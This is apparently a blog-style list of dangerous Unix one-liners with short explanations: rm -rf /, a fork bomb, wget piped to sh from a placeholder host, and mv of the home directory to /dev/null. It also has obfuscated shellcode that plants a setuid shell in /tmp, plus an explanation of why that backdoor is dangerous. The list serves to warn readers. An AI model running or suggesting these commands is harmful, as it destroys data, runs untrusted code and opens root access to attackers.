- the oldie but goodie
1 | rm -rf / |
will recursively/force erase starting from the root directory
- the obfuscated oldie but goodie
1 2 3 4 5 6 7 8 9 10 11 | char esp[] __attribute__ ((section(".text"))) /* e.s.prelease */= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68""xffxffxffxffx68xdfxd0xdfxd9x68x8dx99""xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7""x56x04xf7x56x08xf7x56x0cx83xc4x74x56""x8dx73x08x56x53x54x59xb0x0bxcdx80x31""xc0x40xebxf9xe8xbdxffxffxffx2fx62x69""x6ex2fx73x68x00x2dx63x00""cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;"; |
same as the previous one but harder to tell what it actually does
- the fork bomb
1 | <code class="plain plain">:(){:|:&};:</code> |
forks processes until the box dies. note that this command should not result in permanent damage unlike the other ones.
- running code from a remote source
1 | wget http://remote_source.com/lulscript -O- | sh |
lulscript will be executed on the local machine
- the one you don’t need root for
1 | mv ~/* /dev/null |
sends the relative home directory into a black hole
Why the command “cp /bin/sh /tmp/beyond; chmod 4755 /tmp/beyond” is dangerous??
Why?
You’re taking a shell, copying it into a world readable folder, and you’re setting the SUID bit. This means any user can execute a shell as the owner, presumably root.
For example, say someone compromised a website running on the same machine, they would be able to run any command as root, not just be bound by the web user.